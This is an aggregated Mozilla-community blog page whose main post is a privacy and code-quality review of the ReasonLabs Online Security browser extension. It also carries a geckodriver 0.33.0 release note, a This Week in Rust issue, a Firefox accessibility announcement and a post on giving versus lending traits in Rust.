tXgMOWd6ZgXwquq50vs+X4mi7BKE2b1Mi6Zq2Y+Kw7dAEbYYzhsSA+SRPu5vrJgL
TNQmGxxbrSA+lCUvQ8dPywXz00vKiQwI9uRqtK0LX1BLuHKIhg4OgxAAnmFSZgu7
wIsE2kBYwabCSIFJZzHu0lgtRyYrY8Xh7Pg+V9slIiMGG4SIyq5eUfmU8bXjc4vQ
kE6KHxsbbzN6gFVLX1KDjxRKh+/nG/RDtfw/ic7iiXZfgkEqzIVgIrtlDb/DK6ZD
MeABnJcZZTJMAC4lWpJGgmnZxfAIGmtcUOA0CKGT43suyYET7L7HXd0TM+cJRnbE
b7m8OexT9Xqqwezfqoi1MGH2g8lRKQE4Z2eEFvCiuJnCw547wtpJWEQrGw1eqL3A
S8Y051YqblbXLbgf5Oa49yo630ehq9OxoLd7+GdWwYBlr/0EzPUWezhdIKKvh1RO
+FQGAlzYJ6Pq7BPwvu3dC3YYdN3Ax/8dj5036Y+mHgDsnmlUk8dlziJ0O3h1fke/
W81ABx4ASBktXAf1IweRbbxqW8OgMhG6xHTeiEjjav7SmlD0XVOxjhI+qBoNPovW
lChqONxablBkuh0Jd6kdNiaSEM9cd60kK3GT/dBMyv0yVhhLci6HQZ+Mf4cbn0Kt
ayzuQLOcdRCN3FF/JNQH3v6LA1MdRfmJlgC4UdiepBb1uCgtVIPizRuXWDjyjzeP
ZRN/AqaUbEoNBHhIz0nKhQGDbst4ugIzJWIX+6UokwPC3jvJqQQttccjAy6kXBmx
fxyRMB5BEeLY0+qVPyvOxpXEGnlSHYmdIS4=
=ZEQW
-----END PGP PUBLIC KEY BLOCK-----

The post Updated GPG key for signing Firefox Releases appeared first on Mozilla Security Blog.

Wladimir PalantOnline Security extension: Destroying privacy for no good reason

These days it’s typical for antivirus vendors to provide you with a browser extension which is meant to improve your online security. I’ll say up front: I don’t consider any such browser extensions recommendable. At best, they are worthless. At worst, they introduce massive security issues.

As an example, I took a brief look at the Online Security extension by ReasonLabs. No, there was no particular reason for picking this one beyond its 7 million users. I think that this extension is a fairly typical representative of its craft.

A pop-up titled “Online Security for Google Chrome” and subtitled “Protects your browsing and personal information by blocking harmful content and real-time detection of data breaches.” A big orange button below says “Scan now.”

TL;DR: Most Online Security functionality is already provided by the browser, and there is little indication that the extension improves on it. However, it implements its functionality in a maximally privacy-unfriendly way, sharing your browsing history and list of installed extensions with the vendor. There is also plenty of sloppy programming, some of which might potentially cause issues.

Features

First I want to take the Online Security features apart one by one. It might come as no surprise, but there is less here than the extension’s description suggests.

URL blocking

The extension description claims:

URL Blocker - Online Security protects you against security breaches that come from browsing suspicious websites. Malware, phishing attempts, crypto-jackers, and scams that can damage both your browser and your device - we track them to keep you and your personal data safe.

If that sounds good, it’s probably because the browser’s built-in protection does such a good job staying in the background. Few people are even aware that it exists. So they will believe antivirus vendors’ claims that they need a third-party product to keep them safe from malicious websites.

Now I cannot really tell how the detection quality of Online Security compares to that of Google Safe Browsing, which most browsers rely on. I can comment on the implementation however. While the built-in protection will block malicious websites both at the top level and as frames, Online Security only looks at top-level addresses.

The much bigger issue however is: unlike the browser, Online Security lacks the data to make a decision locally. Instead, it will query ReasonLabs’ web server for each and every address you navigate to. The query part of the address will be omitted, in case that makes you feel better.

Here is what a typical request looks like:

POST /SSE/v1/scan/urls.ashx HTTP/1.1
Host: apis.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
x-userid: 2362740a-6bba-40d6-8047-898a3b4423d5
Content-Length: 33
Content-Type: application/json

["https://www.google.com/search"]

That’s three user identifiers: two sent as cookies and a third one as x-userid HTTP header. While the former will be reset when the browsing data is cleared, the latter is stored in the extension and will persist for as long as the extension is installed. We’ll see that unique user identifier again.

This request will be sent whenever a new page loads. There is no caching: the extension won’t recognize that it queried the server about the exact same page seconds ago but rather send a new request.
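For illustration, here is roughly what such a cache could look like – a hypothetical sketch, not the extension’s actual code; `queryServer` stands in for the real request to the vendor’s API:

```javascript
// Minimal TTL cache for server verdicts: the same address queried twice
// within a few minutes produces only one network request.
const verdictCache = new Map(); // url -> { verdict, expires }
const CACHE_TTL_MS = 5 * 60 * 1000;

async function checkUrl(url, queryServer) {
  const now = Date.now();
  const cached = verdictCache.get(url);
  if (cached && cached.expires > now) {
    return cached.verdict; // cache hit: nothing is sent to the server
  }
  const verdict = await queryServer(url);
  verdictCache.set(url, { verdict, expires: now + CACHE_TTL_MS });
  return verdict;
}
```

Even a short-lived cache like this would eliminate the duplicate requests caused by reloading the same page.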

That’s not quite as invasive as what we’ve seen with Avast’s data collection, where the context of each page load was collected as well. Well, at least usually it isn’t. When Online Security performs a scan, be it manual or automated, it will send the addresses of all your tabs to the server:

POST /SSE/v1/scan/urls.ashx HTTP/1.1
Host: apis.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
x-userid: 2362740a-6bba-40d6-8047-898a3b4423d5
Content-Length: 335
Content-Type: application/json

[
  "https://example.com/",
  "chrome://extensions/",
  "https://chrome.google.com/webstore/detail/online-security/llbcnfanfmjhpedaedhbcnpgeepdnnok/related",
  "https://www.test.de/Geld-anlegen-mit-Zinsen-4209104-0/",
  "chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/index.html",
  "chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/index.html"
]

Yes, that even includes duplicate addresses. Still, likely no malice is involved here. Yet 17 years after Firefox 2 introduced privacy-preserving phishing protection, we shouldn’t have to discuss this again.

Protection against malicious websites in modern browsers will typically use local data to check website addresses against. The server will only be queried if there is a match, just in case the data changed in the meantime. And this should really be the baseline privacy level for any security solution today.
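The prefix-matching scheme can be sketched as follows – a toy illustration of the principle only, with a made-up hash function and blocklist (Safe Browsing actually uses truncated SHA-256 digests):

```javascript
// Toy 16-bit "hash prefix" – purely illustrative, not a real hash.
function toyHashPrefix(host) {
  let h = 0;
  for (const c of host) h = (h * 31 + c.charCodeAt(0)) >>> 0;
  return h & 0xffff;
}

// Hypothetical local database, e.g. downloaded once per day.
const localPrefixes = new Set([toyHashPrefix("malicious.example")]);

function needsServerLookup(host) {
  // For the vast majority of navigations this returns false, and
  // nothing about the user's browsing ever leaves the browser.
  return localPrefixes.has(toyHashPrefix(host));
}
```

Only on the rare local match does the browser ask the server to confirm, so the server never sees the full browsing history.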

What happens to the data?

It’s impossible to tell from the outside what ReasonLabs’ servers do with this data. So we have to rely on the information provided in the privacy policy:

We will also collect URLs and the preceding referral domains to check if they are malicious.

Good, they mention collecting this data in unambiguous terms.

In this regard, we will send the URLs to our servers but only store their domains in order to operate and provide the Software services.

So they don’t claim that the data is deleted. They won’t keep the full addresses, but they will keep the domain names. This statement leaves some open questions.

Most importantly, the privacy policy doesn’t mention the user identifier at all. If it’s stored along with the domain names, it still allows conclusions about the browsing habits of an individual user. There is also a non-negligible deanonymization potential here.

Also, what kind of services need this data? It’s hard to imagine anything that wouldn’t involve user profiles for advertising.

Extension blocking

Next feature:

Disables Harmful Extensions - Online Security identifies all extensions installed on your browser and disables the harmful ones that may hijack your browser settings.

Yet another piece of functionality that is already built into the browser. However, once again the built-in functionality is so unintrusive that antivirus vendors see a chance to sell you the same functionality.

I’m unsure about the implementation details for Chrome, but Firefox has a local blocklist-addons.json file that it checks all browser extensions against. In case of a match the extension is disabled.

Online Security on the other hand opted for a less privacy-friendly approach: when scanning, it will send the complete list of your installed extensions to ReasonLabs’ server:

POST /SSE/v1/scan/extensions.ashx HTTP/1.1
Host: api.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
Content-Length: 141
Content-Type: application/json

[
  "kpcjmfjmknbolfjjemmbpnajbiehajac",
  "badikkiifpoiichdfhclfkmpeiagfnpa",
  "nkdpapfpjjgbfpnombidpiokcmfkfdgn",
  "oboonakemofpalcgghocfoadofidjkkk"
]

The privacy policy acknowledges collecting this data but doesn’t tell what happens to it. At least the x-userid header isn’t present, so it’s only cookies identifying the user.

Well, maybe they at least do a better job at blocking malicious extensions than the browser does? After all, Google has been repeatedly criticized for not recognizing malicious extensions in Chrome Web Store.

Yes, but Google will remove and block malicious extensions when notified about them. So the only way of performing better than the built-in functionality is scanning for malicious extensions and keeping quiet about it, thus putting users at risk.
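To illustrate the difference, a local check needs nothing more than a downloaded list of blocked IDs – a hypothetical sketch with made-up extension IDs; in a real extension the installed list would come from chrome.management.getAll():

```javascript
// Compare installed extension IDs against a locally stored blocklist.
// Nothing about the user's installed extensions leaves the browser.
function findBlockedExtensions(installed, blockedIds) {
  return installed
    .map(ext => ext.id)
    .filter(id => blockedIds.has(id));
}

// Made-up data for illustration:
const blockedIds = new Set(["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]);
const installed = [
  { id: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", name: "Bad extension" },
  { id: "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", name: "Good extension" },
];
findBlockedExtensions(installed, blockedIds); // ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]
```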

Searching data leaks

Let’s move on to something the browser won’t do:

Dark Web Monitoring - lets you know when your email-related information has become exposed. It will reveal details like passwords, usernames, financial information, and other sensitive details while providing steps to remediate the issue.

This sounds really fancy. What it actually means, however: the extension can check whether your email address is present in any known data leaks. It will also use this feature as leverage: you have to register to run the check regularly, and you have to buy the premium version in order to scan multiple email addresses.

It so happens that the well-known website Have I Been Pwned provides the same service for free and without requiring you to register. Again, maybe they aren’t as good? Hard to tell.

When I enter me@mailinator.com into Have I Been Pwned, the result cites 99 data breaches and 7 pastes. Doing the same in Online Security yields merely 2 data breaches, which suggests a rather poor data basis.

Interestingly, SpyCloud (which Online Security privacy policy cites as a partner) claims “659 breach exposures” for me@mailinator.com. It won’t tell any details unless you pay them however.

Download monitoring

Now you probably expect that an antivirus vendor will focus on your downloads. And Online Security has you covered:

Monitors Downloads - Online Security seamlessly integrates with RAV Endpoint Protection providing a full and comprehensive protection across your web browser and personal computer.

In other words: you have to install their antivirus, and then the extension will trigger it whenever you download something.

Which, quite frankly, isn’t very impressive. The IAttachmentExecute::Save method has been available as a way to run antivirus applications since Windows XP SP2. Mozilla added support for it with Firefox 3, which was released 15 years ago. Chrome likely supported this from day one. So antivirus software has had a supported way to scan downloads for a very long time. It doesn’t need browser extensions for that.

Cookie and tracker blocking, notification control

And then there are a few more things that pretend to be useful features:

Blocks Cookies and Trackers - Online Security identifies and blocks malicious cookies and trackers that target you with aggressive and hostile advertising. This allows you to keep your browsing experience private and safe.

Notification Control - Online Security blocks notifications from malicious websites and puts the control at your fingertips, so you can easily follow and remove unwanted notifications through the extension dashboard.

Don’t let the wording here confuse you: Online Security is not an ad blocker. It won’t actually block trackers, and it won’t really help you get rid of cookies or notifications.

This entire block of functionality is reserved exclusively for websites that Online Security considers malicious. When it encounters a malicious website (which, by its definition, can only be a top-level website), Online Security will delete cookies and browsing data for this website. It will also disable notifications from it.

Now you are probably wondering: what’s the point if malicious websites are blocked anyway? But they aren’t actually blocked. Since Online Security doesn’t have its data available locally, it has to query its web server to decide whether a website is malicious. By the time it receives a response, the website might have loaded already. Only then will the tab be redirected to the extension’s “Blocked website” page.

So this functionality is merely a band-aid for the window of opportunity this extension grants malicious websites to do mischief.

Explicit tracking

Whenever you open some extension page, when you click something in the extension, if you merely sneeze near the extension, it will send a tracking event to track.atom-ds.com. The request looks like this:

POST / HTTP/1.1
Host: track.atom-ds.com
Content-Type: text/plain;charset=UTF-8
Content-Length: 438

{
  "auth": "",
  "data": "[{
    \"clientcreated\":1683711797044,
    \"extension_id\":\"llbcnfanfmjhpedaedhbcnpgeepdnnok\",
    \"version\":\"3.13.1\",
    \"random_number\":902,
    \"action\":\"click\",
    \"product\":\"rav_extension\",
    \"screenid\":\"home_tab\",
    \"button\":\"see_more\",
    \"screencomponentname\":\"notifications\",
    \"status\":\"2_notifications_blocked\",
    \"ext_uid\":\"2362740a-6bba-40d6-8047-898a3b4423d5\"
  }]",
  "table": "digital_solutions_cyber_extensions_ui"
}

The ext_uid field here is the persistent user identifier we’ve seen as x-userid HTTP header before.

Now this kind of tracking might not be unusual. It’s being disclosed in the privacy policy:

(ii) time and date of certain events related to the Software (such as launching and scanning, updating and uninstalling the Software), activity log of your use of the Software and the most used features of the Software

With the supposed purpose:

To provide, support and operate the Software as well as to further develop, enhance and improve our Software and your user experience with our Software.

Of course, it would have been nice for such functionality to be opt-in, but who would object to their favorite browser extension being improved?

Well, it would also have been nice to say that this data is not being stored together with the user identifier. But it probably is, so that ReasonLabs has user profiles containing both browsing history and the user’s extension usage.

I wonder however: who runs the atom-ds.com domain? The privacy policy claims that Google Analytics is being used for monitoring, but this isn’t the Google Analytics domain. Online Security probably used Google Analytics in the past, but it doesn’t right now.

I also doubt that the domain is owned by ReasonLabs. This domain is listed in various tracking protection lists, so it presumably belongs to some company in the business of monitoring users. And ReasonLabs failed to list this third party in their privacy policy.

Code quality issues

None of this means of course that browser extensions created by antivirus vendors cannot be useful. But they tend not to be. Which in my opinion is likely a question of priorities: for an antivirus vendor, their browser extension is never a priority. And so they don’t hire any expertise to develop it.

This lack of expertise is how I explain the common pattern of providing a minimal extension and then escaping into a native application as soon as possible. That’s not what the Online Security developers did, however; their extension is largely independent of the antivirus product.

The result isn’t exactly instilling confidence however. It has an unused page called newtab.html titled “Chrome Extension Boilerplate (with React 16.6+ & Webpack 4+).” It seems that they used a publicly available extension boilerplate and failed to remove the unnecessary parts. As a result, their extension contains among other things the unused files newtab.bundle.js and panel.bundle.js, weighing 190 KiB each.

But not only that. It contains its own copy of the Google Analytics script (another 140 KiB), also unused of course. I am fairly certain that copying this script violates Google’s license terms.

There are also more serious issues with the code. For example, there is a hardcoded list with almost 500 domains:

[
  "birkiesdipyre.com",
  "birlerskababs.com",
  // …
  "hegrem.com",
  "hehraybryciyls.com"
].forEach((domain, index) =>
{
  chrome.declarativeNetRequest.updateDynamicRules({
    addRules: [{
      id: index + 1,
      priority: 1,
      action: {
        type: "redirect",
        redirect: {
          url: chrome.runtime.getURL("/index.html?url=http://"+btoa(domain)+"#/Blocked")
        }
      },
      condition: {
        urlFilter: domain,
        resourceTypes: ["main_frame"]
      }
    }]
  });
});

It sort of makes sense to block some domains unconditionally, even if ReasonLabs’ server is down. It doesn’t make sense to use only domains starting with letters B to H however. No idea why the full list isn’t used here. It cannot be the package size, as there would have been obvious ways to cut down on this one (see above).

Note also that the condition uses the urlFilter keyword, which matches the domain name anywhere in the address, rather than requestDomains. So instead of blocking only these domains, they blocked every address where these domain names can be found – which could be e.g. websites writing about these domains.

And the redirect target? They’ve put http:// outside the btoa() call, so the page cannot decode the url parameter and renders blank. It seems that this functionality hasn’t been tested at all.
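For comparison, here is how the parameter could have been built so that the receiving page can decode it – a simplified sketch, not the extension’s actual code:

```javascript
const domain = "malicious.example";

// What the extension does: "http://" ends up outside the base64 data,
// so atob() on the receiving page fails (":" is not a base64 character).
const broken = "http://" + btoa(domain);

// Encoding the entire URL keeps the round trip intact:
const encoded = btoa("http://" + domain);
atob(encoded); // "http://malicious.example"
```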

That’s just the obvious mistakes in a small piece of code. Another typical bug looks like this:

var hostname = new URL(url).hostname.replace("www.", "");

Clearly, the intention is to remove the www. prefix at the start of a host name. Instead, this will remove the first occurrence of www. anywhere in the host name. So gwww.oogle.com, for example, becomes google.com.
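The fix is to anchor the pattern to the start of the host name, for example with a regular expression – a trivial sketch:

```javascript
// The buggy string version removes the first "www." wherever it occurs:
"gwww.oogle.com".replace("www.", ""); // "google.com" – wrong website!

// Anchoring the pattern makes it touch only an actual prefix:
function stripWwwPrefix(hostname) {
  return hostname.replace(/^www\./, "");
}
stripWwwPrefix("www.google.com");  // "google.com"
stripWwwPrefix("gwww.oogle.com");  // "gwww.oogle.com" – left alone
```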

And that’s a pattern used all over the codebase. It’s used for removing cookies, deleting browsing data, setting site permissions. All of this could potentially be misdirected to an unrelated website.

For example, here is what the notifications settings display after I opened the extension’s “Blocked website” page for gwww.oogle.com:

Page titled “Notifications control” listing two sources: gwww.oogle.com and suspendeddomain.org. The former is underlined with a thick red line.

And here is what the cookie settings show:

Page titled “Cookies and trackers” listing two sources: google.com and suspendeddomain.org. The former is underlined with a thick red line.

Conclusion

As we’ve seen, Online Security provides little to no value compared to functionality built into browsers or available for free. At the same time, it implements its functionality in a massively privacy-invading way. That’s despite better solutions to the problem having been available and widely publicized for more than a decade.

In addition, the code quality issues that I noticed in my glimpse of the extension’s source code aren’t exactly confidence-inspiring. As so often with antivirus vendors, developing browser extensions gets little expertise and/or priority.

If you really want to secure your browsing, it’s advisable to stay away from Online Security and similar products by antivirus vendors. What makes sense is an ad blocker, possibly configured to block trackers as well. And the antivirus had better stay outside your browser.

Mind you, Windows Defender is a perfectly capable antivirus starting with Windows 10, and it’s installed by default. There is little reason to install a third-party antivirus application.

Firefox Developer ExperienceGeckodriver 0.33.0 Released

We are proud to announce the next major release of geckodriver, 0.33.0. It ships with some new features that have been frequently requested by the WebDriver community, and as such brings geckodriver closer to full WebDriver classic compatibility.

New Features

Support for “Get Computed Label” and “Get Computed Role”

To help the various developers who are working on accessibility tests, as well as our own colleagues at Mozilla who are improving the accessibility APIs within Gecko (e.g. as part of the Interop 2023 work), two APIs from the WebDriver classic specification have been implemented.

The command Get Computed Label returns the accessibility label (sometimes
also referred to as Accessible Name), which is a short string that labels the
function of the control (e.g. the string “Comment” or “Sign In” on a button).

Example that shows how to retrieve the accessibility label for an element on a web page:

def test_get_computed_label(session, inline):
    session.url = inline('<button aria-label="sign-in">Sign In</button>')
    element = session.find.css('button', all=False)
    assert_success(element.computed_label, 'sign-in')

The command Get Computed Role returns the reserved token value (in ARIA,
button, heading, etc.) that describes the type of control or content in the
element.

Example that shows how to retrieve the accessibility role for an element on a web page:

def test_computed_role(session, inline):
    session.url = inline('<input role="searchbox">')
    element = session.find.css('input', all=False)
    assert_success(element.computed_role, 'searchbox')

Please note that for both APIs the minimum required Firefox version is 113.0, which currently is on the Beta Channel.

Support for “Find Element From Shadow Root” and “Find Elements From Shadow Root”

The commands allow a lookup of individual elements or collections of elements
within an open or even closed Shadow DOM. All location strategies except Tag name and
XPath selector are currently supported.

Example that shows how to retrieve an input element that is part of a custom element’s Shadow DOM, and afterward simulating a key input by a user:

def test_find_elements(session, inline):
    session.url = inline('<custom-element>')  # Shadow DOM with input element
    custom_el = session.find.css('custom-element', all=False)
    input_el = custom_el.shadow_root.find.css('input', all=False)
    input_el.send_keys('foo')

Note that the minimum required Firefox version is 113.0 for both APIs.

Changes

  • We have deprecated the usage of the moz:useNonSpecCompliantPointerOrigin capability. This boolean capability was used to indicate how the pointer origin for an action command will be calculated. If enabled, the offset position was determined by the top-left corner of the given element origin instead of its in-view center point.

    If any of your code relies on this particular Firefox-only capability set to True, it needs to be adjusted to work with the capability’s value set to False or removed.

    The removal of the capability will happen with Firefox 116, which means the next Firefox 115 ESR release will still support it for another year while getting security updates.

Downloads

As usual, links to the pre-compiled binaries for popular platforms and the source code are available on the GitHub repository.

This Week In RustThis Week in Rust 494

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is dlhn, a serde-compatible serialization format geared for performance.

Thanks to Shogo Otake for the self-suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Calls for Proposals

Open calls for submissions to conferences and meetups.

Updates from the Rust Project

386 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

  • No RFCs issued a call for testing this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-10 - 2023-06-07 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Thanks to all for the very helpful responses. “The Book” says “The community is very welcoming and happy to answer students’ questions”; I expected that to be just marketing, but I was wrong.

Daryl Lee on rust-users

Thanks to evann for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Mozilla BlogFirefox 113 significantly boosts accessibility performance

An illustration shows the Firefox logo, a fox curled up in a circle.

About five years ago Mozilla shipped Firefox Quantum, an upgrade that included significant performance improvements for most Firefox users. Unfortunately, Firefox Quantum didn’t improve performance for people who use screen readers and other assistive technology. In some ways, our screen reader performance actually regressed with the architecture changes that Quantum delivered.

The Firefox accessibility engineers remedied much of that performance regression in the late twenty-teens, but by 2020 they’d done all they could to keep up. Continued investment in the old architecture simply wasn’t going to be enough to maintain a competitive browser so we began planning a re-write, which became a project called Cache the World. This upgrade changes the way things work in Firefox’s accessibility code so that screen readers and other assistive technologies have fast access to the content they need.

Today, with the release of Firefox 113, those improvements are available to all Firefox users on Windows, Mac, Linux, and Android.

Browsers are more complicated today than when Firefox’s accessibility engine was first designed, and the most significant overall change has been the move to security-isolated, multi-process architectures. With multiple isolated processes, screen readers had to do a lot of expensive work to retrieve and relay content to users. We were inspired by Chrome’s approach and extended it to improve Firefox’s accessibility performance; Firefox now provides a cache of all tab and browser UI content to screen readers in the browser’s parent process, where it can be used quickly and very easily.

This blog post by accessibility tech lead Jamie Teh provides more context and technical details on the project, but the largest impact you’ll notice immediately is speed. For some of the worst use cases — like pages with very large tables — Firefox now performs up to 20 times faster, and we’re clocking other very large pages at 10 times faster! However, even for the most everyday actions, like opening and closing a Gmail message or switching channels in a Slack window, the performance is 2 to 3 times better.

This upgrade shipped for Android last year in the Firefox 102 release, for Windows and Linux in the Firefox 112 release, and today it arrives on MacOS, which completes our rollout to all Firefox platforms. We’re very excited to be delivering this performance and stability improvement to you all, and we’re eager to hear your feedback and answer questions. Please let us know what you think about these changes in a comment on this post, and if you’ve found something broken, report it in a Bugzilla ticket. Got a completely different idea for making Firefox accessibility better? Please join us and share it via Mozilla Connect.

Asa Dotzler, on behalf of the Firefox accessibility team: Jamie Teh, Eitan Isaacson, Morgan Rae Reschenberg, Anna Yeddi, Nathan LaPré, and Kim Bryant

The post Firefox 113 significantly boosts accessibility performance appeared first on The Mozilla Blog.

Niko Matsakis: Giving, lending, and async closures

In a previous post on async closures, I concluded that the best way to support async closures was with an async trait combinator. I’ve had a few conversations since the post and I want to share some additional thoughts. In particular, this post dives into what it would take to make async functions matchable with a type like impl FnMut() -> impl Future<Output = bool>. This takes us down some interesting roads, in particular the distinction between giving and lending traits; it turns out that the closure traits specifically are a bit of a special case in terms of what we can do backwards compatibly, due to their special syntax.

Goal

Let me cut to the chase. This article lays out a way that we could support a notation like this:

fn take_closure(x: impl FnMut() -> impl Future<Output = bool>) { }

It requires some changes to the FnMut trait which, somewhat surprisingly, I believe are backwards compatible. It also requires us to change how we interpret -> impl Trait when in a trait bound (and likely in the value of an associated type); this could be done (over an Edition if necessary) but it introduces some further questions without clear answers.

This blog post itself isn’t a real proposal, but it’s a useful ingredient to use when discussing the right shape for async closures.

Giving traits

The split between Fn and async Fn turns out to be one instance of a general pattern, which I call “giving” vs “lending” traits. In a giving trait, when you invoke its methods, you get back a value that is independent from self.

Let’s see an example. The current Iterator trait is a giving trait:

trait Iterator {
    type Item;
    fn next(&mut self) -> Option<Self::Item>;
    //      ^ the lifetime of this reference
    //        does not appear in the return type;
    //        hence "giving"
}

In Iterator, each time you invoke next, you get ownership of a Self::Item value (or None). This value is not borrowed from the iterator.1 As a consumer, a giving trait is convenient, because it permits you to invoke next multiple times and keep using the return value afterwards. For example, this function compiles and works for any iterator (playground):

fn take_two_v1<T: Iterator>(t: &mut T) -> Option<(T::Item, T::Item)> {
    let Some(i) = t.next() else { return None };
    let Some(j) = t.next() else { return None };
    // *Key point:* `i` is still live here, even though we called `next`
    // again to get `j`.
    Some((i, j))
}

Lending traits

Whereas a giving trait gives you ownership of the return value, a lending trait is one that returns a value borrowed from self. This pattern is less common, but it certainly appears from time to time. Consider the AsMut trait:

trait AsMut<T: ?Sized> {
    fn as_mut(&mut self) -> &mut T;
    //        -             -
    // Returns a reference borrowed from `self`.
}

AsMut takes an &mut self and (thanks to Rust’s elision rules) returns an &mut T borrowed from it. As a caller, this means that so long as you use the return value, the self is considered borrowed. Unlike with Iterator, therefore, you can’t invoke as_mut twice and keep using both return values (playground):

fn as_mut_two<T: AsMut<String>>(t: &mut T) {
    let i = t.as_mut(); // Borrows `t` mutably
    
    let j = t.as_mut(); // Error: second mutable borrow
                        // while the first is still live
    
    i.len();            // Use result from first borrow
}
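A compiling variant is possible if each lent borrow ends before the next begins. This is a minimal sketch (the function name as_mut_two_ok is invented for illustration): copy out the data you need, and neither borrow has to outlive its own statement.

```rust
// A sketch of the compiling variant: each borrow of `t` ends at the
// semicolon of its own statement, so the second `as_mut` call is fine.
fn as_mut_two_ok<T: AsMut<String>>(t: &mut T) -> (usize, usize) {
    let i = t.as_mut().len(); // first mutable borrow ends here
    let j = t.as_mut().len(); // so a second borrow is allowed
    (i, j)
}
```

The difference from as_mut_two above is purely one of sequencing: we never hold two lent values at once.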

Lending iterators

Of course, AsMut is kind of a “trivial” lending trait. A more interesting one is lending iterators2. A lending iterator is an iterator that returns references into the iterator self. Typically this is because the iterator has some kind of internal buffer that it uses. Until recently, there was no lending iterator trait because it wasn’t even possible to express it in Rust. But with generic associated types (GATs), that changed. It’s now possible to express the trait, although there are borrow checker limitations that block it from being practical3:

trait LendingIterator {
    type Item<'this>
    where
        Self: 'this;
    
    fn next(&mut self) -> Option<Self::Item<'_>>;
    //      ^                        ^^
    // Unlike `Iterator`, returns a value
    // potentially borrowed from `self`.
}

As the name suggests, when you use a lending iterator, it is lending values to you; you have to “give them back” (stop using them) before you can invoke next again. This gives more freedom to the iterator: it has the ability to use an internal mutable buffer, for example. But it takes some flexibility from you as the consumer. For example, the take_two function we saw earlier will not compile with LendingIterator (playground):

fn take_two_v2<T: LendingIterator>(
    t: &mut T,
) -> Option<(T::Item<'_>, T::Item<'_>)> {
    let Some(i) = t.next() else { return None };
    let Some(j) = t.next() else { return None };
    // *Key point:* `i` is still live here, even though we called `next`
    // again to get `j`.
    Some((i, j))
}
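For concreteness, here is a sketch of a lending iterator that actually exercises this freedom. The Doubler type is hypothetical, invented for illustration (and the trait definition is repeated so the snippet stands alone): it reuses one internal buffer, overwriting it on each call to next, which is exactly why its items must be lent rather than given.

```rust
trait LendingIterator {
    type Item<'a>
    where
        Self: 'a;
    fn next(&mut self) -> Option<Self::Item<'_>>;
}

// Hypothetical example: yields `[x, 2*x]` slices for each source value,
// reusing a single buffer. The buffer reuse is what forces lending.
struct Doubler {
    src: Vec<i32>,
    pos: usize,
    buf: Vec<i32>, // overwritten on every call to `next`
}

impl LendingIterator for Doubler {
    type Item<'a> = &'a [i32]
    where
        Self: 'a;

    fn next(&mut self) -> Option<Self::Item<'_>> {
        let x = *self.src.get(self.pos)?;
        self.pos += 1;
        self.buf.clear();
        self.buf.extend([x, x * 2]);
        Some(&self.buf[..]) // lent from `self`; valid until the next call
    }
}
```

Each returned slice is only valid until the next call to next, which is precisely the restriction that makes take_two_v2 unworkable.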

An aside: Inherent or accidental complexity?

It seems kind of annoying that Iterator and LendingIterator are two distinct traits. In a GC’d language, they wouldn’t be. This is a good example of what makes using Rust more complex. On the other hand, it’s worth asking, is this inherent or accidental complexity? The answer, I think, is “it depends”.

For example, I could certainly write an Iterator in Java that makes use of an internal buffer:

class Compute
    implements Iterator<ByteBuffer>
{
    ByteBuffer shared = ByteBuffer.allocate(256);
    
    public ByteBuffer next() {
        if (mutateSharedBuffer()) {
            return shared.asReadOnlyBuffer();
        }
        return null;
    }
    
    // Mutates `shared` and returns true if there is a new value.
    private boolean mutateSharedBuffer() {
        // ...
    }
}

Despite the fact that Java has no way to express the concept, this is most definitely a lending iterator. If I try to write a function that invokes next twice, the first value will simply not exist anymore:

Compute c = new Compute();
ByteBuffer a = c.next();
ByteBuffer b = c.next();
byte a0 = a.get(); // a has been overwritten with b..
byte b0 = b.get(); // ..so `a0 == b0` is always true.

